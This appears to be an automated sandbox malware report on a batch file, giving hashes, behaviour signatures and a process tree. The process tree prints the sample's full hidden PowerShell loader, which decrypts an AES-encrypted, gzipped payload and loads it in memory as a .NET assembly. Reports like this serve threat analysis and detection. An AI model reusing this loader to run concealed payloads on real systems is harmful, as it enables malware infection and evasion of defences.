Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

5

Static

static

1

xccc.bat

windows7-x64

1

xccc.bat

windows10-2004-x64

5

xccc.bat

android-10-x64

xccc.bat

android-11-x64

Analysis

  • max time kernel
    60s
  • max time network
    38s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/04/2024, 13:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    xccc.bat

  • Size

    1.6MB

  • MD5

    a1e6c524a6982d7148de18b82ccf4b4c

  • SHA1

    bfb6449c135de59fb53d65a11b7a1512e4d6ce97

  • SHA256

    c00cc28d3c1b0187d1971c7e399acd5d9acae5c8042cd8d08c5b492697e0d83d

  • SHA512

    a14cb2f7465cd82dab90d9445da7a362b11ff67100db57da886cfd84cce2ba926a889cb4360203ca94cd73728f93abe367421415bb788e090281e3822413a7d8

  • SSDEEP

    24576:BFjjUxX2aos0an5wdEc5R3eGmasM6MK4NWytx5qwmbw61OFW:BGxXjoY5wiqRuGmtw61X

Score
5/10

Malware Config

Signatures

  • Drops file in System32 directory 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xccc.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3700
    • C:\Windows\system32\cmd.exe
      cmd.exe /c powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$GwWqW = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\xccc.bat').Split([Environment]::NewLine);$evTXW = $GwWqW[$GwWqW.Length - 1];$PnSMV = [System.Convert]::FromBase64String($evTXW);$QFQaj = New-Object System.Security.Cryptography.AesManaged;$QFQaj.Mode = [System.Security.Cryptography.CipherMode]::CBC;$QFQaj.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$QFQaj.Key = [System.Convert]::FromBase64String('mQ0sWHznYiuFpX5Tdo9CKYViPqytywMU741Clm4fH+I=');$QFQaj.IV = [System.Convert]::FromBase64String('2JkSgvqzf8gbm9ZwkvRa+w==');$dPqVC = $QFQaj.CreateDecryptor();$PnSMV = $dPqVC.TransformFinalBlock($PnSMV, 0, $PnSMV.Length);$dPqVC.Dispose();$QFQaj.Dispose();$iWYjd = New-Object System.IO.MemoryStream(, $PnSMV);$pPFiF = New-Object System.IO.MemoryStream;$CbaTY = New-Object System.IO.Compression.GZipStream($iWYjd, [IO.Compression.CompressionMode]::Decompress);$CbaTY.CopyTo($pPFiF);$CbaTY.Dispose();$iWYjd.Dispose();$pPFiF.Dispose();$PnSMV = $pPFiF.ToArray();[System.Reflection.Assembly]::Load($PnSMV).EntryPoint.Invoke($null, (, [string[]] ('')))"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:216
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$GwWqW = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\xccc.bat').Split([Environment]::NewLine);$evTXW = $GwWqW[$GwWqW.Length - 1];$PnSMV = [System.Convert]::FromBase64String($evTXW);$QFQaj = New-Object System.Security.Cryptography.AesManaged;$QFQaj.Mode = [System.Security.Cryptography.CipherMode]::CBC;$QFQaj.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$QFQaj.Key = [System.Convert]::FromBase64String('mQ0sWHznYiuFpX5Tdo9CKYViPqytywMU741Clm4fH+I=');$QFQaj.IV = [System.Convert]::FromBase64String('2JkSgvqzf8gbm9ZwkvRa+w==');$dPqVC = $QFQaj.CreateDecryptor();$PnSMV = $dPqVC.TransformFinalBlock($PnSMV, 0, $PnSMV.Length);$dPqVC.Dispose();$QFQaj.Dispose();$iWYjd = New-Object System.IO.MemoryStream(, $PnSMV);$pPFiF = New-Object System.IO.MemoryStream;$CbaTY = New-Object System.IO.Compression.GZipStream($iWYjd, [IO.Compression.CompressionMode]::Decompress);$CbaTY.CopyTo($pPFiF);$CbaTY.Dispose();$iWYjd.Dispose();$pPFiF.Dispose();$PnSMV = $pPFiF.ToArray();[System.Reflection.Assembly]::Load($PnSMV).EntryPoint.Invoke($null, (, [string[]] ('')))"
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1592
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -Command "Get-Process OpenConsole | Stop-Process -Force"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2324

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    e89c193840c8fb53fc3de104b1c4b092

    SHA1

    8b41b6a392780e48cc33e673cf4412080c42981e

    SHA256

    920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c

    SHA512

    865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iwauytea.o4m.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/1592-16-0x00007FFA356C0000-0x00007FFA36181000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1592-12-0x00000284FA900000-0x00000284FA910000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1592-13-0x00000284FD270000-0x00000284FD3A6000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/1592-0-0x00000284FD020000-0x00000284FD042000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1592-11-0x00000284FA900000-0x00000284FA910000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1592-10-0x00007FFA356C0000-0x00007FFA36181000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2324-18-0x00007FFA354D0000-0x00007FFA35F91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2324-19-0x000001D77BB70000-0x000001D77BB80000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2324-20-0x000001D77BB70000-0x000001D77BB80000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2324-32-0x00007FFA354D0000-0x00007FFA35F91000-memory.dmp

    Filesize

    10.8MB

    Download